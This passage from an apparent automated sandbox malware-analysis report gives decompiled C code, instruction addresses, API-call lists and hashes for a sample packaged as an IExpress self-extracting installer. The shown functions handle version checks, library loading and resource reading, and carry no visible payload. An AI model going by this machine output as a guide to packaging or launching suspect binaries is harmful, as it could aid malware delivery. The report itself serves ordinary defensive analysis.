					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E00A944B9(0, _t138);
					L66:
					return E00A96CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}





































                                                                                                                                                                                                        0x00a936f9
                                                                                                                                                                                                        0x00a93700
                                                                                                                                                                                                        0x00a9370c
                                                                                                                                                                                                        0x00a93716
                                                                                                                                                                                                        0x00a93718
                                                                                                                                                                                                        0x00a9371b
                                                                                                                                                                                                        0x00a93721
                                                                                                                                                                                                        0x00a9372b
                                                                                                                                                                                                        0x00a9373d
                                                                                                                                                                                                        0x00a93745
                                                                                                                                                                                                        0x00a93746
                                                                                                                                                                                                        0x00a93746
                                                                                                                                                                                                        0x00a93749
                                                                                                                                                                                                        0x00a937ab
                                                                                                                                                                                                        0x00a937ad
                                                                                                                                                                                                        0x00a937ae
                                                                                                                                                                                                        0x00a937b3
                                                                                                                                                                                                        0x00a937b8
                                                                                                                                                                                                        0x00a937b8
                                                                                                                                                                                                        0x00a937bf
                                                                                                                                                                                                        0x00a937bf
                                                                                                                                                                                                        0x00a937c5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a937cb
                                                                                                                                                                                                        0x00a937cd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a937d5
                                                                                                                                                                                                        0x00a937db
                                                                                                                                                                                                        0x00a937e8
                                                                                                                                                                                                        0x00a937ea
                                                                                                                                                                                                        0x00a937ea
                                                                                                                                                                                                        0x00a937ea
                                                                                                                                                                                                        0x00a937f0
                                                                                                                                                                                                        0x00a937f6
                                                                                                                                                                                                        0x00a93805
                                                                                                                                                                                                        0x00a93817
                                                                                                                                                                                                        0x00a9382b
                                                                                                                                                                                                        0x00a93830
                                                                                                                                                                                                        0x00a93836
                                                                                                                                                                                                        0x00a9383b
                                                                                                                                                                                                        0x00a9383d
                                                                                                                                                                                                        0x00a938eb
                                                                                                                                                                                                        0x00a938eb
                                                                                                                                                                                                        0x00a938f2
                                                                                                                                                                                                        0x00a9390c
                                                                                                                                                                                                        0x00a93911
                                                                                                                                                                                                        0x00a93911
                                                                                                                                                                                                        0x00a93913
                                                                                                                                                                                                        0x00a9394d
                                                                                                                                                                                                        0x00a9394d
                                                                                                                                                                                                        0x00a9394f
                                                                                                                                                                                                        0x00a938a9
                                                                                                                                                                                                        0x00a938a9
                                                                                                                                                                                                        0x00a938b0
                                                                                                                                                                                                        0x00a938b2
                                                                                                                                                                                                        0x00a938b9
                                                                                                                                                                                                        0x00a938bb
                                                                                                                                                                                                        0x00a938c1
                                                                                                                                                                                                        0x00a93975
                                                                                                                                                                                                        0x00a938c7
                                                                                                                                                                                                        0x00a938de
                                                                                                                                                                                                        0x00a938e0
                                                                                                                                                                                                        0x00a938e0
                                                                                                                                                                                                        0x00a9397b
                                                                                                                                                                                                        0x00a9397d
                                                                                                                                                                                                        0x00a939a9
                                                                                                                                                                                                        0x00a9397f
                                                                                                                                                                                                        0x00a93982
                                                                                                                                                                                                        0x00a9398b
                                                                                                                                                                                                        0x00a9398d
                                                                                                                                                                                                        0x00a9398f
                                                                                                                                                                                                        0x00a9399f
                                                                                                                                                                                                        0x00a939a1
                                                                                                                                                                                                        0x00a93991
                                                                                                                                                                                                        0x00a93991
                                                                                                                                                                                                        0x00a93991
                                                                                                                                                                                                        0x00a9398f
                                                                                                                                                                                                        0x00a939af
                                                                                                                                                                                                        0x00a939b6
                                                                                                                                                                                                        0x00a93a0f
                                                                                                                                                                                                        0x00a93a0f
                                                                                                                                                                                                        0x00a93a11
                                                                                                                                                                                                        0x00a93a13
                                                                                                                                                                                                        0x00a93a19
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a939b8
                                                                                                                                                                                                        0x00a939b8
                                                                                                                                                                                                        0x00a939ba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a939bc
                                                                                                                                                                                                        0x00a939bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a939c3
                                                                                                                                                                                                        0x00a939c9
                                                                                                                                                                                                        0x00a939ce
                                                                                                                                                                                                        0x00a939d0
                                                                                                                                                                                                        0x00a939e3
                                                                                                                                                                                                        0x00a939e5
                                                                                                                                                                                                        0x00a939e6
                                                                                                                                                                                                        0x00a939f1
                                                                                                                                                                                                        0x00a939f7
                                                                                                                                                                                                        0x00a939fa
                                                                                                                                                                                                        0x00a93a01
                                                                                                                                                                                                        0x00a93a04
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93a06
                                                                                                                                                                                                        0x00a93a09
                                                                                                                                                                                                        0x00a93a09
                                                                                                                                                                                                        0x00a93a0b
                                                                                                                                                                                                        0x00a93a0b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93a09
                                                                                                                                                                                                        0x00a939fc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a939fc
                                                                                                                                                                                                        0x00a939d3
                                                                                                                                                                                                        0x00a939d8
                                                                                                                                                                                                        0x00a939da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a939dc
                                                                                                                                                                                                        0x00a939b6
                                                                                                                                                                                                        0x00a93955
                                                                                                                                                                                                        0x00a9395b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93961
                                                                                                                                                                                                        0x00a93963
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93969
                                                                                                                                                                                                        0x00a93969
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93969
                                                                                                                                                                                                        0x00a93915
                                                                                                                                                                                                        0x00a93915
                                                                                                                                                                                                        0x00a9391b
                                                                                                                                                                                                        0x00a9391f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9392d
                                                                                                                                                                                                        0x00a93933
                                                                                                                                                                                                        0x00a93938
                                                                                                                                                                                                        0x00a9393a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93940
                                                                                                                                                                                                        0x00a93946
                                                                                                                                                                                                        0x00a9394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a938f2
                                                                                                                                                                                                        0x00a93843
                                                                                                                                                                                                        0x00a93845
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9384b
                                                                                                                                                                                                        0x00a9384d
                                                                                                                                                                                                        0x00a93883
                                                                                                                                                                                                        0x00a93885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9389a
                                                                                                                                                                                                        0x00a9389e
                                                                                                                                                                                                        0x00a9389e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a938a0
                                                                                                                                                                                                        0x00a938a0
                                                                                                                                                                                                        0x00a938a2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a938a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a938a4
                                                                                                                                                                                                        0x00a9384f
                                                                                                                                                                                                        0x00a93851
                                                                                                                                                                                                        0x00a93857
                                                                                                                                                                                                        0x00a9386e
                                                                                                                                                                                                        0x00a93877
                                                                                                                                                                                                        0x00a9387b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93881
                                                                                                                                                                                                        0x00a93859
                                                                                                                                                                                                        0x00a9385c
                                                                                                                                                                                                        0x00a93862
                                                                                                                                                                                                        0x00a93866
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93868
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a938f4
                                                                                                                                                                                                        0x00a938f4
                                                                                                                                                                                                        0x00a938f5
                                                                                                                                                                                                        0x00a938fb
                                                                                                                                                                                                        0x00a93901
                                                                                                                                                                                                        0x00a93901
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9390a
                                                                                                                                                                                                        0x00a9374b
                                                                                                                                                                                                        0x00a9374e
                                                                                                                                                                                                        0x00a9375c
                                                                                                                                                                                                        0x00a93764
                                                                                                                                                                                                        0x00a93769
                                                                                                                                                                                                        0x00a9376e
                                                                                                                                                                                                        0x00a93771
                                                                                                                                                                                                        0x00a9379c
                                                                                                                                                                                                        0x00a9379f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a937a3
                                                                                                                                                                                                        0x00a937a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a937a4
                                                                                                                                                                                                        0x00a93773
                                                                                                                                                                                                        0x00a93777
                                                                                                                                                                                                        0x00a93778
                                                                                                                                                                                                        0x00a9377f
                                                                                                                                                                                                        0x00a93781
                                                                                                                                                                                                        0x00a9378e
                                                                                                                                                                                                        0x00a9378e
                                                                                                                                                                                                        0x00a93794
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93794
                                                                                                                                                                                                        0x00a93783
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93785
                                                                                                                                                                                                        0x00a9378c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9378c
                                                                                                                                                                                                        0x00a93750
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9372d
                                                                                                                                                                                                        0x00a9372d
                                                                                                                                                                                                        0x00a9396b
                                                                                                                                                                                                        0x00a9396b
                                                                                                                                                                                                        0x00a9396c
                                                                                                                                                                                                        0x00a9396e
                                                                                                                                                                                                        0x00a9396f
                                                                                                                                                                                                        0x00a93a1e
                                                                                                                                                                                                        0x00a93a1e
                                                                                                                                                                                                        0x00a93a22
                                                                                                                                                                                                        0x00a93a27
                                                                                                                                                                                                        0x00a93a3e
                                                                                                                                                                                                        0x00a93a3e

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00A93723
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00A939C3
                                                                                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,photo660,00000030), ref: 00A939F1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$BeepVersion
                                                                                                                                                                                                        • String ID: 3$photo660
                                                                                                                                                                                                        • API String ID: 2519184315-2999727582
                                                                                                                                                                                                        • Opcode ID: e370418f6fbe93d458e4d1f8624cc1e0fe5a2f71c2ebcaccb859178b6918ec52
                                                                                                                                                                                                        • Instruction ID: 72ca25b0093826b213ea6c2f3dc6cd66d07a72061314878bf46ebda0ed51e08b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e370418f6fbe93d458e4d1f8624cc1e0fe5a2f71c2ebcaccb859178b6918ec52
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2391F172B012249FEF34CB69CD90BAAB3F1EB45344F1541AAD88ADB251DB718F81CB41
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A96495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                        			E00A96495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0xa98004; // 0x6298f871
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00A91781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
				_t26 = "advpack.dll";
				E00A9658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00A96CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}













                                                                                                                                                                                                        0x00a96495
                                                                                                                                                                                                        0x00a96495
                                                                                                                                                                                                        0x00a964a0
                                                                                                                                                                                                        0x00a964a7
                                                                                                                                                                                                        0x00a964ab
                                                                                                                                                                                                        0x00a964bd
                                                                                                                                                                                                        0x00a964c2
                                                                                                                                                                                                        0x00a964d3
                                                                                                                                                                                                        0x00a964df
                                                                                                                                                                                                        0x00a964e8
                                                                                                                                                                                                        0x00a96502
                                                                                                                                                                                                        0x00a964ee
                                                                                                                                                                                                        0x00a964f9
                                                                                                                                                                                                        0x00a964f9
                                                                                                                                                                                                        0x00a96516

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00A964DF
                                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00A964F9
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00A96502
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                        • API String ID: 438848745-258089097
                                                                                                                                                                                                        • Opcode ID: da82aaaca295d776634be7919b061313847335cd09f9da07cf4eeba76de650d7
                                                                                                                                                                                                        • Instruction ID: 633a4e4d03d8a2d48ab65d7f1b6a912a0697b6a0294d7cc0377eb5a6513f298e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: da82aaaca295d776634be7919b061313847335cd09f9da07cf4eeba76de650d7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC01A470B04108ABDF50EBA4DC49EEE77B8EF65311F50029AF589961D0DF709E8ACA51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A928E8 Relevance: 7.6, APIs: 5, Instructions: 140memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A928E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00A92773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00A92A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00A92A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

































                                                                                                                                                                                                        0x00a928f1
                                                                                                                                                                                                        0x00a928f4
                                                                                                                                                                                                        0x00a928f7
                                                                                                                                                                                                        0x00a928f9
                                                                                                                                                                                                        0x00a928fc
                                                                                                                                                                                                        0x00a928ff
                                                                                                                                                                                                        0x00a92901
                                                                                                                                                                                                        0x00a92907
                                                                                                                                                                                                        0x00a92a62
                                                                                                                                                                                                        0x00a92a64
                                                                                                                                                                                                        0x00a9290d
                                                                                                                                                                                                        0x00a9290d
                                                                                                                                                                                                        0x00a9290f
                                                                                                                                                                                                        0x00a92912
                                                                                                                                                                                                        0x00a92920
                                                                                                                                                                                                        0x00a92937
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92944
                                                                                                                                                                                                        0x00a9294a
                                                                                                                                                                                                        0x00a9294f
                                                                                                                                                                                                        0x00a92a2f
                                                                                                                                                                                                        0x00a92a32
                                                                                                                                                                                                        0x00a92a34
                                                                                                                                                                                                        0x00a92a37
                                                                                                                                                                                                        0x00a92a41
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92955
                                                                                                                                                                                                        0x00a9295e
                                                                                                                                                                                                        0x00a92962
                                                                                                                                                                                                        0x00a92969
                                                                                                                                                                                                        0x00a9296f
                                                                                                                                                                                                        0x00a92974
                                                                                                                                                                                                        0x00a9298c
                                                                                                                                                                                                        0x00a92a20
                                                                                                                                                                                                        0x00a92a21
                                                                                                                                                                                                        0x00a92a27
                                                                                                                                                                                                        0x00a92a4c
                                                                                                                                                                                                        0x00a92a4f
                                                                                                                                                                                                        0x00a92a50
                                                                                                                                                                                                        0x00a92a53
                                                                                                                                                                                                        0x00a92a56
                                                                                                                                                                                                        0x00a92a5c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a929b2
                                                                                                                                                                                                        0x00a929b2
                                                                                                                                                                                                        0x00a929b5
                                                                                                                                                                                                        0x00a929bd
                                                                                                                                                                                                        0x00a929c3
                                                                                                                                                                                                        0x00a929cc
                                                                                                                                                                                                        0x00a929d5
                                                                                                                                                                                                        0x00a929d7
                                                                                                                                                                                                        0x00a929da
                                                                                                                                                                                                        0x00a929dd
                                                                                                                                                                                                        0x00a929df
                                                                                                                                                                                                        0x00a929ec
                                                                                                                                                                                                        0x00a929f8
                                                                                                                                                                                                        0x00a929fc
                                                                                                                                                                                                        0x00a929ff
                                                                                                                                                                                                        0x00a92a02
                                                                                                                                                                                                        0x00a92a07
                                                                                                                                                                                                        0x00a92a0a
                                                                                                                                                                                                        0x00a92a0f
                                                                                                                                                                                                        0x00a92a19
                                                                                                                                                                                                        0x00a92a81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92a0f
                                                                                                                                                                                                        0x00a9298c
                                                                                                                                                                                                        0x00a92974
                                                                                                                                                                                                        0x00a92962
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9294f
                                                                                                                                                                                                        0x00a92912
                                                                                                                                                                                                        0x00a92a65
                                                                                                                                                                                                        0x00a92a68
                                                                                                                                                                                                        0x00a92a6c
                                                                                                                                                                                                        0x00a92a6f
                                                                                                                                                                                                        0x00a92a6f
                                                                                                                                                                                                        0x00a92a7d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalFree.KERNEL32 ref: 00A92A6F
                                                                                                                                                                                                          • Part of subcall function 00A92773: CharUpperA.USER32(6298F871,00000000,00000000,00000000), ref: 00A927A8
                                                                                                                                                                                                          • Part of subcall function 00A92773: CharNextA.USER32(0000054D), ref: 00A927B5
                                                                                                                                                                                                          • Part of subcall function 00A92773: CharNextA.USER32(00000000), ref: 00A927BC
                                                                                                                                                                                                          • Part of subcall function 00A92773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92829
                                                                                                                                                                                                          • Part of subcall function 00A92773: RegQueryValueExA.ADVAPI32(?,00A91140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92852
                                                                                                                                                                                                          • Part of subcall function 00A92773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92870
                                                                                                                                                                                                          • Part of subcall function 00A92773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A928A0
                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00A93938,?,?,?,?,-00000005), ref: 00A92958
                                                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 00A92969
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A93938,?,?,?,?,-00000005,?), ref: 00A92A21
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00A92A81
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3949799724-0
                                                                                                                                                                                                        • Opcode ID: c5b59f4f7ef3d8edd321a8132c5ad63f595662c03cafe54904a88e3e4175a1d8
                                                                                                                                                                                                        • Instruction ID: 183369cd977eeb86233fc5e9757b62452ac8491e2d96eecb4cb0efee83dfb3be
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5b59f4f7ef3d8edd321a8132c5ad63f595662c03cafe54904a88e3e4175a1d8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4512932E00219EFCF25DF98C884AAEBBF5FF48740F14402AE905E7611DB319941DB94
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A94169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 32%
                                                                                                                                                                                                        			E00A94169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E00A9468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E00A9468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E00A944B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
			}





                                                                                                                                                                                                        0x00a9417d
                                                                                                                                                                                                        0x00a9418f
                                                                                                                                                                                                        0x00a94193
                                                                                                                                                                                                        0x00a941b7
                                                                                                                                                                                                        0x00a941d3
                                                                                                                                                                                                        0x00a941e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a941e7
                                                                                                                                                                                                        0x00a941d5
                                                                                                                                                                                                        0x00a941d6
                                                                                                                                                                                                        0x00a941d8
                                                                                                                                                                                                        0x00a941d9
                                                                                                                                                                                                        0x00a941da
                                                                                                                                                                                                        0x00a941df
                                                                                                                                                                                                        0x00a941e1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a941e1
                                                                                                                                                                                                        0x00a941b9
                                                                                                                                                                                                        0x00a941ba
                                                                                                                                                                                                        0x00a941bc
                                                                                                                                                                                                        0x00a941bd
                                                                                                                                                                                                        0x00a941be
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a941be
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
